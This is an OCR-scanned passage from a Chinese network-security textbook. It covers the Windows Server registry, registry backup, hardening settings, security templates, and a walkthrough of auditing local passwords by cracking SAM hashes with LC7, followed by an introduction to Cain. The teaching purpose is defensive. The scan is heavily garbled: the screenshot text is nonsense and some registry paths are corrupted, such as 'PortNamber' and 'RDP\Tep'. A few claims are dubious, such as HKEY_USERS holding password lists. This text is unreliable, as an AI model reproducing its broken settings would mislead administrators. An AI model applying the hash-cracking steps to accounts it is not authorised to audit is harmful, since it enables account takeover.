统 中 起 着 核心 作用 。 这 些 作 用 包括 了 软 、 硬 件 的 相关 配置 和 状态 信息 ,比如 注册 表 中 保存 有 
应 用 程序 和 资源 管理 器 外 壳 的 初始 条 件 .首选 项 和 务 载 数据 等 ,联网 计算 机 的 整个 系统 的 设 
置 和 各 种 许可 ,文件 扩展 名 与 应 用 程序 的 关联 ,硬件 部 件 的 描述 .状态 和 属性 ,性 能 记录 和 其 
他 底层 的 系统 状态 信息 ,以 及 其 他 数据 等 。 


有 1. 注册 表 的 数据 结构 和 数据 类 型 

注册 表 由 键 ( 也 叫 主键 或 称 为 项 ) . 子 键 ( 子 项 ) 和 值 项 构成 。 一 个 键 就 是 分 支 中 的 一 个 
文件 夹 , 而 子 键 就 是 这 个 文件 夹 当 中 的 子 文件 夹 , 子 键 同样 也 是 一 个 键 。 一 个 值 项 则 是 一 个 
键 的 当前 定义 ,由 名 称 、 数 据 类 型 以 及 分 配 的 值 组 成 。 一 个 键 可 以 有 一 个 或 多 个 值 ,每 个 值 
的 名 称 各 不 相同 ,如 果 一 个 值 的 名 称 为 空 , 则 该 值 为 该 键 的 默认 值 。 

注册 表 的 数据 类 型 主要 有 以 下 几 种 ,不 同 数据 类 型 所 占 的 空间 也 不 同 ,如 表 5-3 所 示 。 

表 5-3 ”Windows Server 注册 表 主 要 数据 类 型 
类 型 类 型 索引 | 大 小 说 明 





























REG_BINARY 0 至 多 个 字 节 | 可 以 包含 任何 数据 的 二 进 制 值 
REG_DWORD 4 字 节 一 个 32 位 的 二 进 制 值 ,显示 为 8 位 的 十 六 进 制 值 





REG_SZ 
REG_EXPAND_SZ 
REG_MULTI SZ 


0 至 多 个 字 节 | 一 个 以 NULL 字符 结束 的 字符 串 
0 至 多 个 字 节 | 包含 环境 变量 点 位 符 的 字符 串 
0 至 多 个 字 节 | 多 个 字符 串 的 集合 ,最 后 一 个 字符 串 以 两 个 NULL 结尾 
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上 2. 五 大 根 键 及 其 作用 


在 注册 表 中 ,所 有 的 数据 都 是 通过 一 种 树 状 结构 以 键 和 子 键 的 方式 组 织 起 来 的 ,十 分 类 
似 于 目录 结构 。 每 个 键 都 包含 了 一 组 特定 的 信息 ,每 个 键 的 键 名 代表 这 个 键 的 文件 夹 的 左 
边 将 有 “十 "符号 ,以 表示 在 这 个 文件 夹 中 有 更 多 的 内 容 。 如 果 这 个 文件 夹 被 用 户 打开 ,那么 
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“十 ”就 会 变 成 “一 ”。Windows Server 共有 5 大 根 键 ,全 部 以 HKEY 开头 ,每 个 负责 的 内 容 
不 同 , 下 面 介绍 每 个 根 键 的 内 容 。 

1) HKEY_USERS 根 键 

HKEY_USERS 根 键 保存 了 存放 在 本 地 计算 机 口令 列表 中 的 用 户 标 识 和 密码 列表 。 每 
个 用 户 的 预 配置 信息 都 存储 在 HKEY_USERS 根 键 中 。 不 同 用 户 的 分 支 用 SID 号 区 分 开 ， 
这 个 分 支部 分 将 映射 到 HKEY_CURRENT_USER 关键 字 中 。 本 根 键 中 的 大 部 分 设置 都 可 
以 通过 控制 面板 来 修改 。 

2) HKEY_CURRENT_USER 

HKEY_CURRENT_USER 根 键 包含 了 本 地 工作 站 中 存放 的 当前 登录 的 用 户 信息 , 包 
括 用 户 登 录 名 和 存放 的 密码 (注意 ,这 个 密码 在 输入 的 时 候 是 隐藏 的 )。 用 户 登录 Windows 
操作 系统 的 时 候 ,其 信息 从 HKEY_USERS 中 相应 的 项 复制 到 HKEY_CURRENT_USER 中 。 

3) HKEY_CURRENT_CONFIG 

HKEY_CURRENT_CONFIG 根 键 包含 了 SOFTWARE 和 SYSTEM 两 个 子 键 ,也 是 
指向 HKEY_LOCAL_MACHINE 中 相对 应 的 SOFTWARE 和 SYSTEM 两 个 分 支 中 的 部 
分 内 容 。 存 放 着 当前 用 户 桌 面 配置 的 数据 ,最 后 使 用 的 文档 列表 和 其 他 有 关 的 当前 用 户 的 
Windows 版 本 的 安装 信息 等 。 

4) HKEY_CLASSES_ROOT 

HKEY_CLASSES_ROOT 根 键 根据 Windows 操作 系统 中 所 安装 的 应 用 程序 的 扩展 
名 ,来 指定 文件 类 型 。 

5) HKEY_LOCAL_MACHINE 

HKEY_LOCAL_MACHINE 根 键 存放 本 地 计算 机 的 硬件 和 软件 的 全 部 信息 ,包括 运行 
Windows 的 信息 ,应 用 程序 ,驱动 程序 以 及 硬件 信息 。 


PP 5.3.2 注册 表 的 备份 与 恢复 


Li 注册 表 文件 


在 Windows Server 系统 中 ,所 有 注册 表 文 件 都 放 在 % systemroot%\system32\config 
目录 下 。 此 文件 夹 中 的 每 一 个 文件 都 是 注册 表 的 重要 组 成 部 分 ,对 系统 有 着 关键 作用 。 其 
中 ,没有 扩展 名 的 文件 是 当前 注册 表 文 件 ,主要 包括 以 下 几 项 。 

(1) Default: 默认 注册 表 文 件 。 

(2) SAM: 安全 账户 管理 器 注册 表 文 件 。 

(3) Security: 安全 注册 表 文件 。 

(4) Software: 应 用 软件 注册 表 文 件 。 

(5) System: 系统 注册 表 文件 。 

以 此 目录 下 还 有 一 些 以 . sav 为 扩展 名 的 文件 ,是 上 述 文件 的 备份 ,是 最 近 一 次 系统 正常 
引导 过 程 中 保存 的 ,如 表 5-4 所 示 。Windows Server 会 将 以 上 文件 备份 到 % systemroot%\ 
repair 目录 下 ,以 便 在 出 现 故 障 时 修复 。 
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表 5-4 以 .sav 为 扩展 名 的 注册 表 文 件 























注册 表 配 置 单元 对 应 的 文件 名 
HKEY LOCAL MACHINE\SAM sam 和 sam. log 
HKEY_LOCAL MACHINE\SECURITY security 和 security. log 
HKEY_LOCAL MACHINE\SYSTEM system 和 system. log 
HKEY_LOCAL MACHINE\SOFTWARE software 和 software. log 
HKEY_CURRENT_CONFIG system 和 system. log 
HKEY_USERS default 和 default. log 








上 2. 手动 备份 和 恢复 注册 表 文件 


一 旦 注册 表 受 到 损坏 ,将 会 引发 各 种 故障 ,甚至 导致 系统 * 婴 工 ”。 要 防止 各 种 故障 的 发 
生 , 或 者 在 已 经 发 生 故 障 的 情况 下 进行 恢复 ,备份 和 恢复 注册 表 非 常 重要 。 可 以 通过 以 下 几 
种 方法 进行 操作 。 

Windows Server 注册 表 文 件 的 系统 部 分 放 在 % systemroot%\system32\config 目录 
下 ,与 用 户 有 关 的 配置 文件 Ntuser. dat 和 Ntuser. dat. log 则 存放 在 “% systemroot%\ 
Document and Settings\ 用 户 名 ”目录 下 。 手 动 备份 或 恢复 ,就 是 将 这 些 注册 表 文 件 复制 到 
其 他 地 方 保存 ,如 果 需 要 恢复 , 则 手动 将 这 些 文件 复制 回来 。 

需要 注意 的 是 ,在 系统 正常 运行 时 ,不 能 直接 复制 这 些 文件 ,因为 这 些 文件 正在 被 系统 
使 用 ,只 能 在 另外 一 个 系统 下 进行 。 如 果 Windows Server 系统 使 用 的 是 NTFS 文件 系统 ， 
那么 要 求 用 来 备份 ,恢复 注册 表 文 件 时 使 用 的 操作 系统 也 要 支持 NTFS 文件 系统 。 





有 3. 用 注册 表 编辑 器 备份 和 恢复 注册 表 


启动 注册 表 编 辑 器 ,选择 “注册 表 ” 一 “导出 注册 表 文 件 ” 命 令 , 就 会 弹出 一 个 对 话 框 , 选 
择 保 存 注册 表 文 件 的 路 径 和 文件 名 ,再 单 击 “ 保 存 ” 按 钮 就 可 以 了 。 备 份 文件 以 . reg 为 扩展 
名 。 值 得 注意 的 是 ,此 方法 不 会 备份 安全 注册 表 文 件 和 安全 账户 管理 器 注册 表 文 件 。 恢 复 
时 ,直接 双击 备份 文件 即 可 ,或 在 命令 状态 下 执行 命令 “start 要 还 原 的 文件 . reg”。 


> 5.3.3 注册 表 的 操作 与 应 用 


有 1. 注册 表 的 操作 


在 对 注册 表 进 行 修改 时 ,常用 以 下 几 种 操作 ,如 图 5-18 所 示 。 

(1) 查找 注册 表 中 的 字符 串 、 值 或 注册 表 项 。 

(2) 在 注册 表 中 添加 或 删除 项 、 值 。 添 加 工作 在 “新 建 ”选项 中 完成 ; 要 删除 项 、 值 , 单 击 
要 删除 的 项 \ 值 ,再 选择 “编辑 "一 “删除 ”命令 。 注 意 ,不 能 删除 或 修改 预定 义 的 项 和 值 ,如 
主键 。 

(3) 更 改 注册 表 中 的 值 。 选 择 “ 编 辑 ” 一 “修改 ”命令 。 
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字符 素 值 (S) 
二 进 制 值 (B) 

DWORD (32- 位 ) 值 (D) 
QWORD (64 位) 值 (Q) 
多 字符 案值 (M) 

可 扩充 字符 率 值 (日 








图 5-18 编辑 注册 表 内 容 


(4) 更 新 注册 表 , 使 设置 生效 。 为 了 使 对 注册 表 的 操作 生效 ,需要 重启 计算 机 或 刷新 
桌面 。 如 果 修 改 了 与 系统 相关 的 内 容 ,一般 需 要 重启 计算 机 来 使 设置 生效 。 如 果 修 改 了 
桌面 的 信息 ,直接 按 F5 键 刷 新 就 可 以 了 。 任 务 管理 器 中 ,重启 explorer 进程 ,在 绝 大 多 数 
情况 下 ,能 替代 重启 计算 机 来 生效 注册 表 。 在 实验 或 实际 操作 中 ,是 生效 注册 表 的 首选 
方法 。 


[2: 注册 表 的 应 用 


1) 禁止 建立 空 连接 

Windows 系统 的 默认 安装 允许 任何 用 户 可 通过 空 连接 连 上 服务 器 ,进而 枚 举 出 账号 并 
猜测 密码 。 空 连接 用 的 端口 是 139 ,通过 空 连接 ,可 以 复制 文件 到 远 端 服务 器 ,计划 执行 一 个 
任务 ,这 是 不 安全 的 。 可 以 通过 修改 注册 表 来 禁止 建立 空 连接 。 以 下 内 容 , 把 HKEY _ 
LOCAL_MACHINE 简写 为 HKLM。 

Key: HKLM\System\CurrentControlSet\Control\LSA 

Name: RestrictAnonymous 

Type: DWORD 

Value: 2。 该 值 默 认为 0, 是 指 对 建立 空 连 接 没 有 限制 ; 值 为 1, 表 示 可 以 建立 空 连接 ， 
但 是 不 允许 查看 SAM 账户 和 名 称 ; 值 为 2, 表 示 匿 名 权限 不 能 访问 ,不 能 建立 空 连接 。 

2) 删除 管理 共享 (C$ 等 ) 

可 以 用 netshare 命令 来 删除 这 些 共享 ,但 是 重启 计算 机 后 共享 会 自动 出 现 。 通 过 修改 
注册 表 可 以 完成 删除 。 

Key: HKLM\System\CurrentControlSet\Services\lanmanserver\parameters 

Name: AutoShareServer/ 如 工作 站 为 AutoshareWks 

Type: DWORD 

Value: 0 
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Key: HKLM\Software\ Microsoft\Windows\CurrentVersion 

Name: Run、RunServices 

Value: 删除 不 必要 自 启动 程序 对 应 的 键 值 。 有 些 程 序 也 可 能 在 Run 项 下 的 SysExpl 
子 项 下 。 如 果 有 子 项 ,将 其 中 的 键 值 删除 ,同样 也 能 取消 程序 的 自 启动 。 

4) 更 改 终端 服务 默认 的 3389 端口 

终端 服务 是 Windows 系统 提供 的 ,允许 用 户 在 一 个 远 端的 客户 机 执行 服务 器 上 的 应 用 
程序 或 对 服务 器 进行 相应 的 管理 工作 。 终 端 服务 器 默认 开启 3389 端口 ,许多 黑客 利用 此 端 
口 ,很 容易 进入 系统 。 因 此 ,一般 要 修改 默认 的 端口 号 。 

第 一 步 : 

Key: HKLM\SYSTEM\CurrentControlSet\Control\ Terminal Server\ Wds\rdpwd\ 
TdsNtcp 

Name: PortNamber 

Type: DWORD 

Value: 可 以 用 十 进 制 的 方式 来 操作 ,修改 的 值 为 新 的 端口 号 。 

第 二 步 : 

Key: HKLM\SYSTEM\CurrentControlSet\ Control\ Tenninal Server\ WinStations\ 
RDP\Tep 

Name: PortNamber 

Type: DWORD 

Value: 可 以 用 十 进 制 的 方式 来 操作 ,修改 的 值 为 新 的 端口 号 ,与 第 一 步 保持 一 致 。 

5) 锁定 注册 表 编 辑 器 

维护 注册 表 一 般 是 通过 注册 表 编 辑 器 来 进行 的 ,黑客 入 侵 后 ,对 系统 做 改动 ,这 些 都 会 
反映 到 注册 表 中 ,为 了 阻止 修改 注册 表 , 可 以 锁定 注册 表 编 辑 器 。 

Key: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System 

Name: DisableRegistryTools 

Type: DWORD 

Value: 1。 值 为 1 ,表示 锁定 ,不 能 打开 编辑 器 ; 值 为 0, 表示 可 以 打开 注册 表 编 辑 器 。 

如 果 黑 客 锁定 了 注册 表 , 无 法 通过 修改 值 的 方法 解锁 编辑 器 ,可 以 通过 编辑 注册 表 文 件 
来 修改 ,具体 操作 步骤 如 下 。 

(1) 新 建文 本 文件 并 打开 。 

(2) 输入 以 下 内 容 。 

REGEDIT 

( 空 一 行 。 第 二 行文 本 必须 为 空 .) 

[HKEY_ LOCAL MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System] 

"DisableRegistryTools" = dword:00000000 


(3) 保存 文件 为 扩展 名 * . reg 的 文件 。 


weer 








(4) 双击 此 文件 , 即 可 重新 启动 注册 表 编 辑 器 。 当 然 , 要 让 修改 的 注册 表 生 效 ,需要 重 
启 计算 机 。 

修改 注册 表 的 最 终 手 段 是 修改 键 值 , 键 值 可 能 是 字符 串 ,也 可 能 是 数值 。 一 般 来 说 , 字 
符 串 与 显示 信息 相关 ,如 果 键 值 不 合适 ,还 不 致 产生 严重 后 果 。 而 数值 的 键 值 往往 是 系统 运 
行 时 某 部 分 的 参数 ,有 软件 方面 的 ,也 有 硬件 方面 的 。 例 如 ,回收 站 中 允许 容纳 的 最 大 文件 
数 ,菜单 延迟 的 时 间 值 等 属于 软件 方面 的 参数 ; 显示 器 刷新 频率 就 属于 硬件 方面 的 参数 ,如 
果 显 示 卡 不 支持 85Hz 的 刷新 频率 ,而 在 注册 表 中 强行 设置 ,有 可 能 会 损坏 硬件 。 


j> 5.3.4 注册 表 的 权限 与 维护 


EL 注册 表 的 权限 


类 似 于 文件 和 文件 夹 的 访问 控制 ,Windows 为 注册 表 提 供 了 访问 控制 的 功能 ,可 以 为 用 
户 账号 或 组 分 配 注册 表 预 定义 项 的 访问 权限 。 

在 注册 表 编辑 器 中 ,选择 某 个 键 值 ,然后 右 击 ,选择 快捷 菜单 中 的 “权限 ”命令 ,在 弹出 的 
对 话 框 中 , 单 击 “ 高 级 "按钮 ,如 图 5-19 所 示 。 可 以 编辑 某 个 键 值 针对 某 个 用 户 的 具体 权限 。 
则 Control Panel 的 权限 二 BE cenwol Panel 一 一 


积 限 
要 查看 求 雹 模 权 限 项 目的 涪 细 信息 ， 请 选择 该 顺 目 并 单 击 “编辑 ”。 























组 或 用 户 名 (6) 








Ne rao 
R Ainistrater QercWninistrator) 天虹 。 名 入 权限 继承 于 应 用 于 
Mninistrators QerICWanini 





CURRENT_ISER ”该 项 有 有 振子 顺 
多 许 。 RESTiCTD 流明 CRISER 该 需 及 其 子 项 
































于 吉 Qe) GMD) [ WR) 











国 包 括 可 从 该 对 象 的 从 项 处 承 的 权限 区) 


人 回合 用 可 从 此 大 继 和 9 和 限 答 换 所 有 子 对 外 权限 ) 





了 和 itialts 和 li 可 阻 























Bs 





























aa Ri) [ERw ) 








5-19 注册 表 的 权限 设置 


上 2. 禁止 对 远程 注册 表 的 扫描 


在 默认 状态 下 ,Windows Server 的 远程 注册 表 访 问 路 径 不 为 空 ,因此 黑客 能 利用 扫描 
器 轻松 地 通过 远程 注册 表 访 问 到 系统 中 的 相关 信息 。 为 了 系统 安全 ,应 该 将 远程 可 以 访问 
到 的 注册 表 路 径 全 部 清除 ,以 便 切 断 远程 扫描 通道 。 具 体操 作 步 骤 如 下 。 

(1) 选择 “开始 ”>“ 管 理工 具 ” 一 “本 地 安全 策略 "命令 ,在 打开 的 窗口 中 ,展开 “本 地 策 
略 ” 选 项 的 “安全 选项 ” 子 项 。 

(2) 在 右 侧 选 择 并 打开 “网 络 访 问 : 可 远程 访问 的 注册 表 路 径 和 子路 径 ” 对 话 框 。 在 对 
话 框 中 ,将 远程 可 以 访问 到 的 注册 表 路 径 信息 多 部 清除 ,如 图 5-20 所 示 。 


一 一作 
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文件 上 提 作 (A) ”查看 (V) 大 钝 (H) 

和 中 | 方 国 | 日 已 | 日 画 

到 安全 认可 
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蕊 入 [应 用 愉 


图 5-20 预防 对 远程 注册 表 的 扫描 


有 3. 注册 表 的 维护 


Windows 的 注册 表 实 际 上 是 一 个 很 庞大 的 数据 库 ,包含 了 系统 初始 化 ,应 用 程序 初始 化 
信息 等 一 系列 Windows 运行 信息 和 数据 。 一 些 不 需要 的 软件 卸载 后 Windows 注册 表 中 的 
应 用 程序 参数 往往 不 能 被 清除 干净 ,会 留 下 大 量 垃圾 ,使 注册 表 逐 步 增 大 。 手 动 清理 注册 表 
是 一 件 危险 又 烦琐 的 事 ,可 以 使 用 注册 表 清 理 软件 ,非常 方便 地 维护 注册 表 。 要 先进 行 注册 
表 备 份 后 ,再 清理 注册 表 。 


| 5.4 ”系统 的 安全 模板 “| 系统 的 安全 模板 


j> 5.4.1 安全 模板 概述 


有 1. 安全 模板 的 意义 


安全 模板 是 由 Windows Server 支持 的 安全 属性 的 文件 (. inf) 组 成 的 。 安 全 模板 将 所 有 
的 安全 属性 组 织 到 一 个 位 置 ,以 简化 安全 性 管理 。 安 全 模板 包含 安全 性 信息 账户 策略 、 本 地 
策略 .事件 日 志 、 受 限 组 文件 系统 、 注 册 表 、 系 统 服务 七 类 内 容 。 安 全 模板 也 可 以 用 做 安全 
分 析 。 通 过 使 用 安全 模板 管理 单元 ,可 以 创建 对 网 络 或 计算 机 的 安全 策略 。 安 全 模板 是 代 


@— 





网 络 安全 技术 基础 





表 安 全 配置 的 文本 文件 ,可 将 其 应 用 于 本 地 计算 机 、 导 入 到 组 策略 ,或 用 其 来 分 析 安 全 性 。 


Lz: 预定 义 安全 模板 


预定 义 的 安全 模板 是 作为 创建 安全 策略 的 初始 点 而 提供 的 ,这 些 策略 都 经 过 自 定 义 设 
置 ,以 满足 不 同 的 组 织 要 求 。 可 以 使 用 安全 模板 管理 单元 对 模板 进行 自 定义 设置 。 一旦 对 
预定 义 的 安全 模板 进行 了 自 定义 设置 ,就 可 以 利用 这 些 模板 配置 单 台 或 数 千 台 的 计算 机 。 
可 以 使 用 安全 配置 和 分 析 管 理 单元 、secedit. exe 命令 提示 符 工 具 , 或 将 模板 导入 本 地 安全 策 
略 而 配置 单 台 计 算 机 。 在 Windows Server 中 的 预定 义 的 安全 模板 如 下 。 

(1) 默认 安全 设置 (Setup security. inf) 。Setup security. inf 是 一 个 针对 特定 计算 机 的 
模板 ,代表 在 安装 操作 系统 期 间 所 应 用 的 默认 安全 设置 。 其 设置 包括 系统 驱动 器 的 根 目录 
的 文件 权限 ,可 将 该 模板 或 一 部 分 用 于 灾难 恢复 的 目的 。 

(2) 兼容 (compatws. inf)。 工 作 站 和 服务 器 的 默认 权限 主要 授予 三 个 本 地 组 : 
Administrators、Power Users 和 Users。Administrators 享有 最 高 的 特权 ,而 Users 的 特权 
最 低 。 部 署 可 由 Users 组 的 成 员 成 功 运行 的 应 用 程序 。 具 有 User 权限 的 人 可 以 成 功 运行 
已 加 入 在 Windows Logo Program for Software 中 的 应 用 程序 。 不 要 将 兼容 模板 应 用 到 “ 域 
控制 器 ”。 

(3) 高 级 安全 (hisec * .inf) 。 高 级 安全 模板 是 对 加 密 和 签名 做 进一步 限制 的 安全 模板 
的 扩展 集 , 这 些 加 密 和 签名 是 进行 身份 认证 和 保证 数据 通过 安全 通道 以 及 在 SMB 客户 端 和 
服务 器 之 间 进 行 安全 传输 所 必需 的 。 例 如 ,安全 模板 可 以 使 服务 器 拒绝 LAN Manager 的 响 
应 ,而 高 级 安全 模板 则 可 导致 同时 对 LAN Manager 和 NTLM 响应 的 拒绝 。 安 全 模板 可 以 
启用 服务 器 端的 SMB 信息 包 签名 ,而 高 级 安全 模板 则 要 求 这 种 签名 。 此 外 ,高 级 安全 模板 
还 要 求 对 形成 域 到 成 员 以 及 域 到 域 的 信任 关系 的 安全 通道 数据 进行 强力 加 密 和 签名 。 

高 级 模板 细 分 为 Hisecws. inf 和 Hisecdc. inf, 一般 Hisecws. inf 应 用 到 普通 服务 器 。 
Hisecdc. inf 应 用 到 域 控制 器 。 

(4) 安全 (Secure * ,inf) 。 安 全 模板 定义 了 至 少 可 能 影响 应 用 程序 兼容 性 的 增强 安全 
设置 ,还 限制 了 LAN Manager 和 NTLM 身份 认证 协议 的 使 用 ,其 方式 是 将 客户 端 配置 为 仅 
可 发 送 NTLMv2 响应 ,而 将 服务 器 配置 为 可 拒绝 LAN Manager 的 响应 。 

安全 模板 细 分 为 “Securews. inf 应 用 于 成 员 计 算 机 ”和 “Securews. inf 应 用 于 服务 器 ”。 

(5) 系统 根 目 录 安 全 (Rootsec. inf)。Rootsec. inf 可 指定 根 目 录 权 限 。 默 认 情 况 下 ， 
Rootsec. inf 为 系统 驱动 器 根 目 录 定义 这 些 权 限 。 如 果 不 小 心 更 改 了 根 目录 权限 , 则 可 利用 
该 模板 重新 应 用 根 目 录 权限 ,或 者 通过 修改 模板 对 其 他 卷 应 用 相同 的 根 目 录 权 限 。 正 如 所 
说 明 的 那样 ,该 模板 并 不 覆盖 已 明确 定义 在 子 对 象 上 的 权限 , 它 只 是 传递 由 子 对 象 继承 的 
权限 。 

除了 系统 预定 义 的 安全 模板 外 ,可 以 从 微软 网 站 上 下 载 其 他 模板 。 


PP 5.4.2 安全 模板 的 使 用 
执行 mmc. exe 命令 打开 控制 台 。 单 击 “ 添 加 /删除 管理 单元 "按钮 ,把 “安全 模板 、 安 全 
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配置 和 分 析 ” 添 加 到 控制 台 。 安 全 模板 保存 在 %systemroot%\security\Templates 目录 中 ， 
用 户 也 可 以 创建 包含 安全 设置 的 自 定义 安全 模板 。 

在 Windows Server 2008 中 里 的 模板 是 空 的 。 可 以 从 网 上 下 载 , 或 者 选用 保存 好 的 安全 
模板 (通过 “新 加 模板 搜索 路 径 ? 找 到 文件 ) 。 

对 要 修改 的 安全 策略 ,如 修改 “文件 系统 ”, 则 根据 制定 的 文件 系统 安全 策略 ,可 以 针对 
不 同 的 用 户 进行 权限 设置 。 完 成 修改 后 , 右 击 已 修改 的 安全 配置 模板 的 名 称 ,在 弹出 的 快捷 
菜单 中 ,选择 “另存 为 ”命令 ,新建 一 个 模板 。 














由 1.“ 安 全 配置 和 分 析 " 工 具 介绍 


“安全 配置 和 分 析 ” 是 分 析 和 配置 本 地 系统 安全 性 的 一 个 工具 。 计 算 机 上 的 操作 系统 和 
应 用 程序 的 状态 是 动态 的 。 例 如 ,为 了 能 立刻 解决 管理 或 网 络 问题 ,可 能 需要 临时 更 改 安全 
级 别 。 然 而 ,经 常 无 法 恢复 地 更 改 , 这 意味 着 计算 机 不 能 再 满足 企业 安全 的 要 求 。 

常规 分 析 作 为 企业 风险 管理 程序 的 一 部 分 ,允许 管理 员 跟 踪 并 确保 在 每 台 计 算 机 上 有 
足够 高 的 安全 级 别 。 管 理 员 可 以 调整 安全 级 别 ,最 重要 的 是 ,检测 在 系统 长 期 运行 过 程 中 出 
现 的 任何 安全 故障 。“ 安 全 配置 和 分 析 ” 能 够 快速 查阅 安全 分 析 结 果 。 在 当前 系统 设置 的 旁 
边 提出 建议 ,用 可 视 化 的 标记 或 注释 突出 显示 当前 设置 与 建议 的 安全 级 别 不 匹配 的 区 域 。 
“安全 配置 和 分 析 ” 也 提供 了 解决 分 析 显 示 的 任何 矛盾 的 功能 。 


上 2. 安全 数据 库 


通过 使 用 “安全 配置 和 分 析 ” 管 理 单元 ,利用 个 人 数据 库 , 可 以 导入 由 “安全 模板 ”功能 创 
建 的 安全 模板 ,可 以 通过 将 模板 导入 安全 设置 ,很 方便 地 配置 多 台 计 算 机 ,也 可 以 将 安全 模 
板 作 为 分 析 系 统 潜在 安全 漏洞 或 策略 侵犯 的 基础 。 

安全 数据 库 : 安全 配置 引擎 是 由 数据 库 驱 动 的 ,不 知道 安全 模板 的 存在 ,因此 在 配置 、 
分 析 一 个 系统 之 前 ,必须 要 把 模板 导入 数据 库 。 

如 果 还 未 设置 一 台 工作 数据 库 , 选 择 * 打 开 数 据 库 命 令 以 设置 一 台 工 作 数 据 库 。 输 入 
新 数据 库 的 名 称 ,以 . sdb 为 扩展 名 ,然后 单 击 “ 打 开 ? 按 钮 ,找到 安全 模板 并 打开 ,并 将 其 选 
中 ,选择 "导入 之 前 清除 这 个 数据 库 ” 复 选 框 。 

右 击 “ 安 全 配置 和 分 析 ” 选 项 ,在 弹出 的 快捷 菜单 中 选择 “立即 配置 计算 机 ”命令 ,弹出 一 
个 窗口 ,显示 错误 日 志文 件 的 路 径 , 然 后 单 击 “ 确 定 ” 按 钮 。 

要 注意 ,只 有 在 重启 计算 机 后 ,安全 设置 才 生 效 。 


LB. 查看 分 析 结 果 


在 “安全 配置 和 分 析 ” 节 点 中 ,展开 “本 地 策略 ”一 “安全 选项 ” 子 项 。 在 打开 的 窗口 中 ， 
右边 的 窗 格 显示 每 个 对 象 和 数据 库 设 置 和 实际 系统 设置 。 红 色 显 示 不 一 致 的 地 方 , 绿 色 
显示 一 致 的 地 方 。 没 有 标记 或 检查 记号 ,表明 导入 的 模板 (数据 库 ) 中 对 该 项 安全 设置 没 
有 配置 。 





@ 一 一 


| 网 络 安全 技术 基础 


EEETEEEDD 操作 系统 安全 实例 


一 般 入 侵 者 获取 用 户 的 密码 口令 的 方法 有 口令 扫描 、Sniffer 密码 嗅 探 .暴力 破解 .社会 
工程 学 ( 即 通过 欺诈 手段 获取 ) 以 及 木马 程序 或 键盘 记录 程序 等 。 密 码 破解 和 审核 工具 很 
多 ,如 Windows 平台 口令 的 LC5、`WMICracker\SAMInside 等 。 通 过 这 些 工 具 的 使 用 ,可 以 
了 解 口令 的 安全 性 。 


PP 5.5.1 使 用 LC7 审计 Windows Server 本 地 账户 


LOphtCrack( 简 写 为 LC) 是 美国 计算 机 安全 公司 @Stake 组 织 开发 的 Windows 平台 口 
令 审 核 的 程序 ,提供 了 审核 Windows 账号 的 功能 ,以 提高 系统 的 安全 性 。 在 Windows 32 位 
操作 系统 平台 上 ,一 般 使 用 LC5 或 LC6 版 本 的 软件 。 如 果 在 x64 平台 上 ,要 使 用 LC7 来 进 
行 操作 。 另 外 ,LC 也 是 一 种 很 有 名 的 密码 破解 软件 能 破解 用 LM 加 密 的 SAM, 所 以 ,了 解 
LC 的 使 用 方法 ,可 以 避免 使 用 不 安全 的 密码 ,从 而 提高 用 户 本 身 系统 的 安全 性 。 
有 关系 统 用 户 账户 密码 口令 破解 ,最 基本 的 方法 有 两 个 : 穷 和 字典 法 。 它 们 都 是 
密码 匹配 的 破解 方法 。 对 于 Windows 系统 SAM 中 存储 的 是 密码 哈 希 值 ,词典 攻击 通 
过 在 破解 整个 过 程 中 使 用 相同 的 单 向 哈 希 算法 ,对 词典 中 的 密码 进行 计算 。 穷 举 法 也 是 如 
此 ,只 是 穷 举 法 先进 行 所 选取 的 字母 或 者 数字 的 组 合 ,然后 进行 哈 希 算法 的 再 比较 ,如 果 组 
合 的 数量 很 大 , 那 破解 的 时 间 就 会 很 长 。 

LC7 软件 的 具体 操作 步骤 如 下 。 

(1) LC7 的 安装 很 方便 ,安装 后 默认 运行 界面 如 图 5-21 所 示 。 弹 出 窗口 上 显示 “密码 审 
计 向 导 、 开 始 新 会 话 和 打开 已 有 会 话 ? 选 项 。 也 可 以 关闭 窗口 ,用 左 侧 菜单 操作 。 
Ex 
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图 5-21 LC7? 运行 界面 


—© 
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(2) 选择 “密码 审计 向 导 ” 命 令 .根据 向 导 进行 各 项 设置 ,如 图 5-22 所 示 。 





Choose Target System Type 


Vnix-like 
Lin 


Windows Import 


Erom which to retrieve the Windows 


the domain if this is 


A file generated by PYDunp, FGDunp or conpatible tool 





(b) 选择 分 析 本 机 


Windows Import From Local Machine 


which e ials to use while performing the 


d-In User Credentials 


ntials 





(©) 选择 执行 哈 希 提取 时 使 用 的 凭据 
图 5-22 ”密码 审计 向 导 过 程 





令 破解 的 方式 ,如 图 5-23 所 示 。 
(4) 设置 报告 风格 ,并 设置 作业 调度 计划 。 最 后 生成 审计 的 结果 ,如 图 5-24 所 示 。 























网 络 安全 技术 基础 


Choose Audit Type 


e the type of audit you w 


Quick Password Audit 
This method ss for passwords th d find in a dictionary, with conmon 
permutat 


Connon Password Audit 
This method forp t nary, with many 


a 1 hour long anumeri 


Thorough Password Audit 
This method chec d find in a dictionary, 
permutat 

This is fa by R br attack using a large 


Strong Password Audit 
This method starts with a ur long brute-fo the entire 

I | er set 

了 ds that could fin with all available 


Dictionary: wordlist-nediun txt, 253525 words，Ho length linit, 1 hour maxima 
Tunbo Plus’ permutati 





图 5-24 密码 审计 结果 
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图 5-24 的 结果 是 3 个 账户 的 基本 信息 ,测试 时 用 的 弱 口 令 , 几 秒 的 时 间 马 上 就 破解 了 。 
还 包括 账户 是 否 禁 用 等 信息 。 
还 可 以 使 用 菜单 选择 破解 SAM 文件 ,如 图 5-25 所 示 。 





Run Import Immediately Add Import To Queue 





图 5-25 破解 SAM 文件 中 的 账户 信息 


破解 的 SAM 应 该 不 是 当前 正在 使 用 的 SAM 文件 。 最 好 应 该 先 运 行 Windows PE 系 
统 , 把 原 有 操作 系统 的 SAM 和 System 文件 备份 ,再 进行 破解 。 如 果 是 32 位 操作 系统 ,除了 
用 PE 系统 备份 文件 ,还 可 以 用 SAMCopyer、WinHex 等 工具 进行 备份 。 


j* 5.5.2 使 用 Cain 审计 Windows Server 本 地 账户 


Cain 是 由 Oxid. it 开发 的 针对 Microsoft 操作 系统 的 免费 口令 恢复 工具 。 其 功能 十 分 
强大 ,可 以 网 络 嗅 探 \ 网 络 欺骗 ,破解 加 密 口 令 .解码 被 打 乱 的 口令 .显示 口令 框 . 显 示 缓 存 口 
令 和 分 析 路 由 协议 等 。 软 件 有 两 个 程序 : 一 个 是 Cain 主 程序 ; 另 一 个 是 Abel 服务 程序 。 
